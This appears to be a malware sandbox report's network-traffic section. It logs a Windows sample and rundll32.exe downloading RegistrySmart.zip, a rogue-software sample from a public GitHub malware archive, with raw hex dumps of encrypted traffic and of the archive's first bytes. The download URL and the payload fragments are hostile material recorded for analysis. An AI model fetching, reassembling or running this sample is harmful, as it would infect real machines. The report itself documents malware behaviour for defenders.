                                                                                                                                                            2022-09-29 12:45:19 UTC28511INData Raw: 0f 20 48 d8 b0 30 f4 d1 48 b0 c3 4d 95 df cd cf 39 e4 52 75 5a 2e f3 3f a0 9e 6b 5b e7 55 73 84 58 6f cb 24 8e a3 cb f9 5b 33 bd 26 c1 b6 f8 b9 7c 2b 8f ca ce eb 9c af 23 18 47 9c 1c d0 cd 07 a6 f7 c9 9a 14 b7 cf 76 a6 89 4c 62 cf 54 5a 9c 28 8a f0 a3 ce 67 47 9f 45 d7 77 57 8d 43 83 b6 ef af 83 9a 01 33 e5 51 50 2e bc d5 51 49 a8 3b 8e a7 09 38 07 f6 b2 93 ba f7 36 b3 4d 93 f6 fc 38 f2 20 79 1b 15 f5 27 13 62 18 c8 7a cc 96 8c 1a 19 95 7e 99 91 d9 d3 7e d4 74 83 5b e0 22 03 86 af 28 d8 5b 59 0f 32 d3 06 07 26 e8 47 90 95 cb 80 9b 0f 19 01 b9 cc 26 95 53 77 58 3a 3c 97 84 21 8f 69 72 c9 ed 1e 47 da 20 c5 c7 f1 2e 5a ee a3 2a a7 ed e2 4d 49 ad 28 42 d6 88 93 49 20 99 2a a1 e1 77 78 63 8a 55 35 cd 03 a4 6a f3 2d d1 ac 43 5b 51 88 d2 a3 13 e9 06 5b ae c2 f2
                                                                                                                                                            Data Ascii: H0HM9RuZ.?k[UsXo$[3&|+#GvLbTZ(gGEwWC3QP.QI;86M8 y'bz~~t["([Y2&G&SwX:<!irG .Z*MI(BI *wxcU5j-C[Q[
                                                                                                                                                            2022-09-29 12:45:19 UTC28527INData Raw: d1 cd 10 f0 5b 2a 00 32 50 13 c1 b5 32 6f f9 23 05 47 43 c4 c0 55 80 63 e1 dd a6 4a 11 70 1f cd 74 f1 62 11 ee fe e6 b6 b6 b3 22 24 54 a0 22 1d d8 1c 55 3d 48 9b 9e 76 c6 11 65 9d da f3 68 23 67 20 5f 3a f4 32 11 5d 77 6c 99 17 01 8e 3f 5e b4 bd 26 ea e6 c2 66 ce 57 93 f5 2f a3 25 56 85 97 b0 22 71 df 25 62 96 0c 56 3f ef 36 6a ad 3b ce cd ef c6 8a e7 56 fc 24 ee 98 98 bb e6 e9 99 2b 67 eb b6 b4 d2 2e 44 4e b3 e7 fb 26 a8 06 bc 4d 0c e7 a0 e3 80 e6 d5 97 ef 80 92 1f 5b 3b 00 f0 62 2d b3 44 8f cd 50 af 78 8c ff dc f8 23 0e 42 a5 c0 03 69 59 39 00 93 0e dd bd f4 b6 02 fc e7 02 e3 86 74 8d 52 d1 3c 48 5f 3e b4 94 4f ca 73 bc 5e 50 e0 1a 9e b9 49 7d 26 89 cd bc 37 35 5c 11 6b 64 88 07 6b 34 b1 08 e4 44 4d d0 d5 b9 dc 3b 55 74 b6 e4 cc 15 6d ef 27 34 d7 80 e1
                                                                                                                                                            Data Ascii: [*2P2o#GCUcJptb"$T"U=Hveh#g _:2]wl?^&fW/%V"q%bV?6j;V$+g.DN&M[;b-DPx#BiY9tR<H_>Os^PI}&75\kdk4DM;Utm'4
                                                                                                                                                            2022-09-29 12:45:19 UTC28543INData Raw: a9 84 88 26 42 6e 9a 78 e6 58 03 77 22 b6 41 30 2e be 8d 40 7f cd ec 86 84 5f 00 52 c4 e1 d4 d8 e7 04 39 85 d8 bc 2c d9 d1 79 3a 78 cd 8d 63 be 45 c3 96 a6 42 58 aa 71 9b e1 f1 6f 3c 4d 33 00 9d ba 9d 02 84 5c 4f 5b 6c 34 08 54 9d de ff cd b1 0f 7d d2 df 44 68 89 92 c7 19 bb 46 a9 28 6e d0 44 52 9b 68 28 9f a5 16 62 62 3b 5c 99 ee 73 91 dc 65 3a 7a d4 08 be 53 17 05 bb 7c b6 d1 a2 28 d5 c0 92 63 6d e9 c8 91 14 33 54 2c f1 83 d7 1b cb ee 43 19 85 f1 cb 9e 0e 41 62 f0 1c 5e a7 89 4f 0d 99 a4 69 73 d8 d8 06 d5 f9 ac 36 99 0e 83 de e1 1c ef ba 08 22 90 ea f6 3b 03 7f 96 88 0e 88 1c 28 6a b3 8d d6 75 d6 5b 45 ae 90 aa 19 0f 04 c7 86 fa 64 f8 63 e4 92 95 1c 98 cf 0b 9a 8a 4a e9 e8 4d b2 fc b8 af c6 9a 78 0a ed 9a 0a 19 6a 8f 7c b0 ad de b6 e4 69 9f a2 29 87 be
                                                                                                                                                            Data Ascii: &BnxXw"A0.@_R9,y:xcEBXqo<M3\O[l4T}DhF(nDRh(bb;\se:zS|(cm3T,CAb^Ois6";(ju[EdcJMxj|i)
                                                                                                                                                            2022-09-29 12:45:19 UTC28559INData Raw: 56 0a e9 0a d0 cb b5 64 cd 4a 4f dd 1b 26 27 26 f9 87 bb fd 0a 52 54 27 eb 2a a8 92 22 80 f8 60 b2 09 c3 4a 1a 7c cb 4b dc b4 97 f9 2c c9 2d 74 7c ec f2 18 b7 ad 79 ae 88 8c fa 7f db 7a a1 15 45 aa a0 19 7e 0b 5b 2a b0 90 c4 0d 51 ed 2f da 41 ef 6a 7a 9f 45 87 26 53 cc a6 a0 74 0d 00 5d 09 de 98 16 57 92 ce c9 2a ae 6d 35 d5 ab ce 85 3d 25 42 be f2 f7 82 7f 3c 1f 7d 68 2c 07 a2 e2 ef 9e 08 e9 ae 05 4e c0 97 ae 5c 70 ff 1a d8 70 48 cb 63 92 ba 3c d4 f2 36 f5 53 12 ca 79 b1 7e 5d 07 77 5c 14 9a 8a 82 95 e5 a9 a8 5c 9f 59 de 33 eb a1 c8 c7 26 0c f2 6d 30 07 8d bc 0f 93 ab 56 6b d8 f4 b9 ec 6a fd 94 cb 84 c6 7f 90 af e8 40 f4 b3 ea cf 8f b7 53 06 69 48 cc 00 bb 11 52 6b 24 0e 0d 0d 68 df 58 4f 4e bd 11 f9 4c 6f 91 cf ea 57 1f 0d 17 b8 ec d1 53 da 70 56 69 1f
                                                                                                                                                            Data Ascii: VdJO&'&RT'*"`J|K,-t|yzE~[*Q/AjzE&St]W*m5=%B<}h,N\ppHc<6Sy~]w\\Y3&m0Vkj@SiHRk$hXONLoWSpVi
                                                                                                                                                            2022-09-29 12:45:19 UTC28575INData Raw: 7c 12 a1 d9 e8 ee ea b5 46 80 15 bc a4 82 68 f5 ce 54 cf e3 66 fb ec c2 d7 9b 3c a8 1a 41 7d 9f 83 16 6f 8f 3c 17 71 27 5a 3e ae 94 d9 5b 79 3b fb d6 95 b5 73 a3 50 6e 0f c5 15 2d ca cb 09 0e 9a e6 e8 91 18 9d c6 7f 14 ef 76 36 f3 fd 07 32 fb 89 a7 26 4f 29 a3 bb fc 40 b9 53 9c eb d9 19 38 38 08 24 df f0 4a ce dc 58 a4 ff 66 3f 89 7e 9b 36 a3 6c bc d3 cb 9d 3d 2a 5a 29 93 7b 06 9c 65 9b 4c 5e 52 4b c2 df 80 2c ea cc 31 f9 6a 24 14 58 0a a6 c0 f1 8a 8b 41 31 5c 9a 65 33 62 c1 eb d7 8b ab 66 76 e4 80 30 2b 13 f1 4b a0 72 44 66 ea 20 82 aa 64 32 e0 ff aa 4c ff 01 5c 60 16 22 12 f1 dc 16 df e5 57 cf 39 93 a7 87 50 f1 88 85 79 5b e2 b5 b5 98 8a a1 53 c6 b5 64 79 a9 fa 6d 73 ad d9 28 c1 86 82 b7 94 93 78 ff 4d 79 51 a5 17 21 dc df d1 6f 8e 39 ae 37 c5 4e 12 d7
                                                                                                                                                            Data Ascii: |FhTf<A}o<q'Z>[y;sPn-v62&O)@S88$JXf?~6l=*Z){eL^RK,1j$XA1\e3bfv0+KrDf d2L\`"W9Py[Sdyms(xMyQ!o97N


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            106192.168.2.649761140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:20 UTC28586OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            107140.82.121.4443192.168.2.649761C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:20 UTC28586INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:20 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:20 UTC28587INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            108192.168.2.649762185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:20 UTC28588OUTGET /Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            109185.199.110.133443192.168.2.649762C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:20 UTC28588INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 1070715
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "1d24269eaf781907e4c1af48234a4a75d4d097f07863219e5c2eb72d5943a4d9"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0807:0541:22EA5A:2E231E:63359360
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:20 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6940-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455520.416237,VS0,VE191
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: bfdbb798f0f37f4c799a1eb716a533828be1db36
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:20 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:20 UTC28589INData Raw: 50 4b 03 04 33 00 01 00 63 00 08 61 55 4d 00 00 00 00 a7 55 10 00 70 bc 10 00 1c 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 52 65 67 69 73 74 72 79 53 6d 61 72 74 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 b9 21 09 4a 7c 9c 8c 4c 0e 36 13 b9 58 07 20 9e 22 2f 2c 6b 82 70 ca 5c 39 7c a2 07 a5 11 35 7e fb a8 14 c8 0b 2a 30 0d 8a 99 c6 3a 6c e3 c0 dd 0a 73 5d e0 4f f9 3d 77 f4 dd c6 8a 53 bd 95 5b bf 93 ed 29 b0 50 34 88 15 c0 df f0 38 87 1b 10 9a 47 02 e0 5e 8b 6b 46 62 90 ee 5d d7 84 5d a7 0d 75 91 86 35 f6 de 3c 6d 1e 2f 2c 76 e2 33 85 f7 8e a5 65 f5 55 8f b4 2f 6b c8 b3 69 8b 8e c0 30 10 e6 34 b8 b3 bf cc 26 be 1f 82 ab 82 ab f0 e5 f5 92 20 b1 91 e9 f6 fc d4 60 dd 90 07 74 75 c2 8d e1 92 61 da d5 e6 8a ff e7 b5 06 5d 4b c6 30 83 ae bb 41 2c 8c 23 73 7a
                                                                                                                                                            Data Ascii: PK3caUMUpEndermanch@RegistrySmart.exeAE!J|L6X "/,kp\9|5~*0:ls]O=wS[)P48G^kFb]]u5<m/,v3eU/ki04& `tua]K0A,#sz
                                                                                                                                                            2022-09-29 12:45:20 UTC28590INData Raw: 23 a7 2f 9b e0 1d fa f9 17 3f c3 bd 52 41 99 6e ea 1b bc bd cc 63 56 e2 0b 11 d5 c6 ce 76 35 b6 ca 43 e5 da 04 45 1b 94 6d e5 49 8a b1 d6 a8 cd c3 af aa af 9a 0d a8 f1 46 e6 7f bb 58 c1 e0 3d 6d b2 0e 03 ca 79 81 9b 6c df 23 c3 f1 6c c1 b5 60 54 cf 20 68 b0 b3 56 43 8c b8 25 33 83 5d 0f 43 70 0a b5 02 81 c8 06 b3 13 57 05 91 b4 c9 03 eb 59 35 c8 e5 6a 23 a8 fa ba c7 37 3b 70 c6 c6 99 aa 1a 29 c5 da d6 1b 18 2d 99 6c bd 5c a2 a4 eb a7 fa 03 51 f3 b9 a5 19 ca 37 58 08 a5 7c 0f 56 02 eb a7 bd 2e b1 df 00 e4 c0 03 6a 49 87 03 1e 44 e9 4c 9d 94 4f 0a 4c 01 a7 a2 4a e4 c3 12 14 7d 0a bf 82 3e a1 bc c0 cd ae 7d 02 ce 35 27 e3 4a 49 1e d3 75 52 85 3d 35 ad a0 bf 0f 43 1b 48 da d2 0a ba 1a 01 ab be 32 69 7f 62 1d 66 eb 55 29 fe 20 d1 4e 62 8a f2 a0 9f a6 18 cc 6c
                                                                                                                                                            Data Ascii: #/?RAncVv5CEmIFX=myl#l`T hVC%3]CpWY5j#7;p)-l\Q7X|V.jIDLOLJ}>}5'JIuR=5CH2ibfU) Nbl
                                                                                                                                                            2022-09-29 12:45:20 UTC28592INData Raw: 15 eb f9 e1 c3 ca 44 c7 5c 0a 5e be 51 04 d7 f4 a0 4a ae fb 44 06 b0 0f 36 09 2b d2 ec bd 99 d6 97 31 f8 2e 24 fb cf 55 f9 c1 e0 4c af d2 7d 10 05 88 4c fe 9c d9 56 cd a0 64 b2 c8 3b b8 7f 21 a4 71 1d fe af af cc 08 91 04 6f 5b 2c 4a d4 33 54 bb 4a 9c e5 2f f9 a1 94 bb a8 82 b7 82 fe c6 09 58 2c d7 ba b0 85 a7 cb 1e 00 a0 fa 17 56 55 f8 6f a2 f5 df 34 c8 fe 99 ec 8e af d6 08 4d d8 af 03 a7 dd 5e 34 18 c0 c1 8a e2 54 2a d9 7f 9b fb ca d8 52 30 15 7e e7 b1 e7 07 55 22 c7 35 b8 f8 f3 d9 78 39 1a f9 c0 29 97 7a 4a 04 1b 53 6a 77 c4 b8 07 44 67 ab af ed d5 c1 69 3a d4 ec 84 5c 39 4c c1 8e 4f c7 58 13 3a ce bc 8f b8 42 14 db ef 0c 4c 8c 90 91 b5 3b 2c ad f4 7b 28 7b a7 ed 27 6b d0 c8 c8 74 5c dd c6 1a 39 76 44 3b 5c 1e de 82 d1 b5 3b fe 11 cf 07 a1 aa d1 7f 9a
                                                                                                                                                            Data Ascii: D\^QJD6+1.$UL}LVd;!qo[,J3TJ/X,VUo4M^4T*R0~U"5x9)zJSjwDgi:\9LOX:BL;,{({'kt\9vD;\;
                                                                                                                                                            2022-09-29 12:45:20 UTC28593INData Raw: af cb 1b 25 b6 fe 65 08 e2 a2 25 3c 8c 3a 04 30 c9 db c1 28 6b 4c 89 75 7e 66 d7 3f 36 c4 67 58 31 f5 5f 11 8d 71 47 ce 35 28 71 18 3c 66 4f 58 3a 63 f0 36 88 e5 77 7a d4 7a 56 cc e9 2f a5 4e 61 9e 2c cc 11 45 e7 09 72 65 fa dd d9 58 78 31 3b 4e e1 4c bd d0 87 6e e8 e7 3a 1e 4a 77 e6 b3 ed 76 b8 ff 1e 06 f3 88 50 b1 46 4f bc 41 79 f3 ea d3 3c 5f b2 7e 09 a3 bc 2b 24 49 cd f3 b1 19 70 37 39 10 40 46 85 6e ae 1d 92 b4 ea dc 99 dd f8 13 4e ce fc 3e ad 8f b3 e9 bf 94 47 cf 8b 53 98 27 8f 4b 88 0e e2 76 fb 80 de 99 1e 8d 65 c2 03 94 a7 96 37 96 ba 31 35 4d f5 d7 6e 1d 70 db 72 1c 6b 00 ad 5a f4 98 14 7f ec b4 71 1f 6d 62 ed 50 a5 ef d9 15 a8 4e a1 2a d7 9f e9 28 28 c2 eb 74 3d 73 aa 05 d1 e9 ce d0 80 84 32 96 f6 c9 77 58 e7 5c 8a 4a 30 25 0c 2c 3e e0 e5 f0 fd
                                                                                                                                                            Data Ascii: %e%<:0(kLu~f?6gX1_qG5(q<fOX:c6wzzV/Na,EreXx1;NLn:JwvPFOAy<_~+$Ip79@FnN>GS'Kve715MnprkZqmbPN*((t=s2wX\J0%,>
                                                                                                                                                            2022-09-29 12:45:20 UTC28594INData Raw: 66 d5 26 fa 63 65 21 5f fc a7 32 b0 ac 68 dc 83 30 fe fa 63 9b 5f 8b 74 56 c9 50 2c 9a 7c 9d 3a 5a 3c 73 ef b2 44 6e 8e a0 6e 0a 2a c4 8d b1 18 cf dc a8 6c 2f 26 2a 19 e8 eb d4 fe 86 ed 48 72 1c 16 78 a5 2f e7 af 0e 5b cb 9e ba b6 69 de de 3e 12 95 88 6b 08 30 16 b2 01 4d 10 06 82 3a d1 aa 2f 39 6b 88 1f 13 92 8c e8 36 c7 54 7c b9 df 78 b0 6a 7f d3 e3 89 f6 28 20 39 b0 9c f1 c2 e0 15 29 a6 fd da 7a 8d e5 5a 48 d6 c5 82 74 e6 04 b7 99 39 b8 f7 f7 db 14 7d 3a 35 6f af 0f ff 76 da f9 7c 4c 3d e4 5c e8 1f 26 c3 fd 82 18 30 74 b3 d5 d5 01 b2 12 1c 3f ed e3 e3 2f 89 1c 81 81 a8 ca 14 7d c9 10 8a 74 f2 2c a7 05 c2 95 d9 af 0b 0b 06 b9 20 34 c8 36 d1 7c 02 55 93 28 ec 9a 19 72 b7 09 9f d1 2b f1 d0 2a 6c 86 9f dc eb 2e 18 e8 d5 7a 52 1b 94 11 c7 9a 32 0f 9f e2 ca
                                                                                                                                                            Data Ascii: f&ce!_2h0c_tVP,|:Z<sDnn*l/&*Hrx/[i>k0M:/9k6T|xj( 9)zZHt9}:5ov|L=\&0t?/}t, 46|U(r+*l.zR2
                                                                                                                                                            2022-09-29 12:45:20 UTC28596INData Raw: 98 62 66 41 25 da 53 03 5c 30 c2 a8 9b e9 1b 3f 3d 0b 3c a4 db 0a c4 33 a5 67 77 1d 4f ec a5 da a3 a2 d5 30 4a 4a 91 06 af 48 76 5c 6c 77 29 7f fd 79 cc 44 61 37 03 b4 4a 10 4c 85 ef 0f 91 bb d3 f9 2e 11 0d 74 f2 fd f4 7e b4 41 92 70 b3 fc 9c 77 28 a2 fb da fb 50 b8 1f 1d 7f 86 90 c7 41 9c 2e 20 d2 76 09 a0 db 93 26 55 8f c1 f0 fa e8 c5 5d 0d 5c 6b cb 3e b0 e5 54 f8 14 b3 8a df 85 73 d0 b6 be 10 2d 29 68 f4 2e 86 9b 43 8e cf 7d a9 06 bc 34 fe 33 94 8f b4 0f 71 d2 4a 31 af b6 77 f2 4d 6d 08 08 f6 f2 e4 92 e8 c5 9f 8f d5 b0 df 20 36 b9 de f7 93 6f b5 d4 10 69 8d 3b e5 74 99 5a ea 0a 16 d9 82 d6 7e 48 4b ad 7a 9d 8d 4a f6 b0 ce 22 d6 59 25 da 1e 90 0b cf d9 f0 09 8a c6 1f b9 92 5b 5d fc e8 1f 1d b8 ca 71 db 26 fa 39 42 56 0d d3 ff d0 bc 84 73 1c 62 c2 66 eb
                                                                                                                                                            Data Ascii: bfA%S\0?=<3gwO0JJHv\lw)yDa7JL.t~Apw(PA. v&U]\k>Ts-)h.C}43qJ1wMm 6oi;tZ~HKzJ"Y%[]q&9BVsbf
                                                                                                                                                            2022-09-29 12:45:20 UTC28597INData Raw: fe e9 7d 49 fb b1 66 3d b5 88 75 c7 9f 1e b8 7f 97 1d e3 c9 53 0d 3c 67 a3 9e 2a 54 1d bd 63 94 f4 7a 89 83 bc de 80 45 a7 fa 9c 63 9c 68 b1 8f 58 5b 57 f9 dd 50 14 9d 4a f0 4e 8d 6c 4b 87 70 5f 00 98 c7 43 ee 93 24 81 a5 67 4f fa e8 62 0c 5a 26 61 e8 f9 cb 0a 7b 2d 21 8c b3 5a 46 26 20 81 d5 53 e4 20 e5 24 ed 4d 4b a5 ed 10 7f f4 16 c9 cc 35 7c 30 34 ed 5f db 49 64 1d 90 dd 1f 2c 42 7e 9e 46 dc 2e ad 7f ab b8 d3 71 27 37 1d 22 ed 13 06 7d 90 02 aa 49 a4 5c c8 0d eb 41 75 b2 d4 25 27 bd 98 05 62 a7 91 b3 96 03 8d b6 ab 45 a1 e0 61 57 62 ca 17 d5 53 5e 53 78 8b 99 46 84 5b dd fc 3a 91 ba 39 3e e9 f7 11 c7 13 31 cf 9e 88 c6 74 95 17 fb 18 17 aa 56 f7 66 5d cb 62 d8 8c 86 ef 20 fd ca c7 84 55 cf 85 85 7f 71 00 3e 92 e8 98 4c 27 57 3a e3 90 44 11 31 32 86 e2
                                                                                                                                                            Data Ascii: }If=uS<g*TczEchX[WPJNlKp_C$gObZ&a{-!ZF& S $MK5|04_Id,B~F.q'7"}I\Au%'bEaWbS^SxF[:9>1tVf]b Uq>L'W:D12
                                                                                                                                                            2022-09-29 12:45:20 UTC28599INData Raw: ca cc f3 98 f5 59 41 b3 ea a9 21 a0 b1 4f 57 de 97 61 54 0c a2 fc a3 94 e9 e7 be 1e 35 17 fc 97 f7 86 18 cc a6 67 01 ce fe 33 55 53 e2 34 e2 6d d2 a1 4e ae ed 06 61 d2 64 db 6a 97 21 4f 45 f1 8f fa 2b 4f 73 42 fe 4f 6d 31 ea 5c 04 2e 0c a8 3b dc 70 45 37 cb 9a 08 8d bc bd fe 35 5d e9 71 4f 1c f1 9f f2 21 b7 73 53 d9 05 03 1a 32 55 bc cf a3 81 9f 02 97 01 fc 7b ce 32 da 06 90 61 27 4b 1c 3f 5b 9b e4 f0 ea b9 13 d5 ae 01 b4 8b 70 7a fd 82 05 cc eb 40 6a 75 f8 89 64 30 82 27 54 b0 25 7b f1 37 c9 45 eb 89 d5 3a 7c 4a ab 45 aa 60 2b 73 d9 af 64 77 0f 93 c2 88 8a 1f 30 76 b8 4d ed 01 48 7e 13 eb c9 bb f3 ab dc 83 53 96 cd 25 47 54 95 9a 40 fd 64 37 58 3b 8d 96 fa 07 69 42 07 9a 9e 06 17 b9 c1 1f ac fb a8 ba 26 ae a0 28 e6 f5 bd ac 80 22 ad 14 b0 37 a6 96 80 f4
                                                                                                                                                            Data Ascii: YA!OWaT5g3US4mNadj!OE+OsBOm1\.;pE75]qO!sS2U{2a'K?[pz@jud0'T%{7E:|JE`+sdw0vMH~S%GT@d7X;iB&("7
                                                                                                                                                            2022-09-29 12:45:20 UTC28600INData Raw: ae 3b 99 6d fa 31 65 27 b6 36 6a 82 c6 b3 4d a5 ff 9c c6 cb fe 40 6c 50 c7 f1 dd ec 23 e6 72 43 af 0e 70 7d ae d0 02 d0 60 9f ac 4b 0d 97 41 51 9e e9 70 13 85 69 4c 79 24 7c 4a a0 99 69 6d 4e 1c 8c b8 20 4b bd e9 51 ea da 7f a3 25 02 bf 65 de 59 65 a9 75 2d f3 84 43 96 db 9e a4 df 5f 06 33 6b b5 a2 ee 59 06 f8 7a 6a 40 c6 7b 57 4f 6f 39 10 ae 3a cf b5 af 99 6d 58 7d 7d c7 83 0d 67 78 a3 53 44 05 0c 2a df 7a de d1 2f c9 32 e3 9f 32 35 dd 0d 85 c9 a1 98 e3 7a 87 34 f5 32 82 98 a8 2a 90 7f f4 c0 f4 a5 21 72 bc 33 fd b8 d1 4a 34 6a dd 16 32 38 ac 88 ea f3 81 0b b2 30 50 e6 e6 0f 14 0b ce a7 1b 70 59 8f 63 c3 f5 96 33 22 fc 4f b1 47 cd 96 71 65 fc 6b 3d 6f d3 fc 5a c7 bc 8b a9 2b 4c 92 87 0d 25 72 cf 30 c9 58 d8 15 ab 95 5d 6d 40 10 4a 62 aa 5e f1 d7 77 b3 18
                                                                                                                                                            Data Ascii: ;m1e'6jM@lP#rCp}`KAQpiLy$|JimN KQ%eYeu-C_3kYzj@{WOo9:mX}}gxSD*z/225z42*!r3J4j280PpYc3"OGqek=oZ+L%r0X]m@Jb^w
                                                                                                                                                            2022-09-29 12:45:20 UTC28601INData Raw: a0 33 11 6c bb ab cd 9f 13 c2 f5 10 8a 57 08 3b 6b 91 4c 7f 0b 40 0b 77 81 73 1e 2f ef db d7 09 90 d4 aa 77 ae 95 8f 8d b2 43 12 14 2b 8b 24 b3 8b 0d ac 40 88 0d 63 ae 2b 59 f1 ff 71 d8 9e f4 a2 00 10 3e 15 f3 34 46 8b 30 80 da 4a 9f c7 93 86 df 13 38 c5 c8 8d a3 d1 ad c8 42 65 b9 70 6b 20 fb 4d 89 d3 5b 0c aa 48 09 21 67 e3 48 98 91 54 35 a9 83 62 a6 cf 41 9a a0 65 0f 5e 06 a8 17 28 d8 b0 77 bb c7 43 af 40 11 00 5c 3f 0e 15 1e 73 6f 86 14 63 d3 fa cc 00 3f 13 29 2e 08 38 d4 da 2e 69 dd 9d 0c 14 ee 09 e1 99 28 3a 30 0f cf ef ba 58 8d a7 1d 8d 72 40 fd 31 73 76 92 70 27 1d e5 82 03 74 c5 40 19 b9 1f 56 87 89 08 76 7a 19 ee be ad 46 86 4c 4e 2d f9 96 f6 a1 65 48 d6 85 b5 53 c2 53 15 af 45 58 cc a4 14 b9 89 b1 79 86 98 a8 83 75 44 f2 b0 f4 aa 9f e9 0a ac f6
                                                                                                                                                            Data Ascii: 3lW;kL@ws/wC+$@c+Yq>4F0J8Bepk M[H!gHT5bAe^(wC@\?soc?).8.i(:0Xr@1svp't@VvzFLN-eHSSEXyuD
                                                                                                                                                            2022-09-29 12:45:20 UTC28603INData Raw: 0e 9e 5b 3f 88 bb 26 14 14 02 65 8d 24 ae eb 61 00 fc 81 c5 e0 c9 51 35 03 43 d0 91 67 0d d9 ff d0 92 bf 79 8e 70 0c 8b 14 d7 d8 ec cf 79 7f 17 b9 22 79 55 f6 e9 08 fb 83 b6 4d d2 98 12 6b 1b 98 7a 72 b3 44 0c b5 47 41 6a 39 9b c2 16 67 bb 99 09 e7 8e ac b3 09 a2 40 1a 31 32 51 5e 7c 42 ab ec 3e 80 a5 16 af 60 24 2d 2b f5 36 79 3f 78 90 14 81 af 49 ce dd 58 a8 22 c9 1a b6 c0 80 f6 6a 25 5e 5b ee bb 7a c5 be aa 92 1b 67 15 ed 6b aa d6 50 65 e0 66 dd 3a e1 2e 39 8c 81 af e0 a3 7d 8f b2 67 15 48 59 11 e1 50 71 b0 f3 fc 3e 73 70 c8 f4 d8 ac 47 47 1b be c2 46 c4 5b 28 0b 9d 1b 37 07 24 7f f8 40 0b e8 b8 67 84 2f 3a f4 14 79 d6 52 58 af dc 2f 24 4e 34 af c7 2b 1b 1e 88 e2 f0 ed 70 1d df 7f a5 6d 88 0d d8 30 24 48 94 03 bf 4a 05 1b 89 ff 39 f7 cb e1 e9 b2 4e 56
                                                                                                                                                            Data Ascii: [?&e$aQ5Cgypy"yUMkzrDGAj9g@12Q^|B>`$-+6y?xIX"j%^[zgkPef:.9}gHYPq>spGGF[(7$@g/:yRX/$N4+pm0$HJ9NV
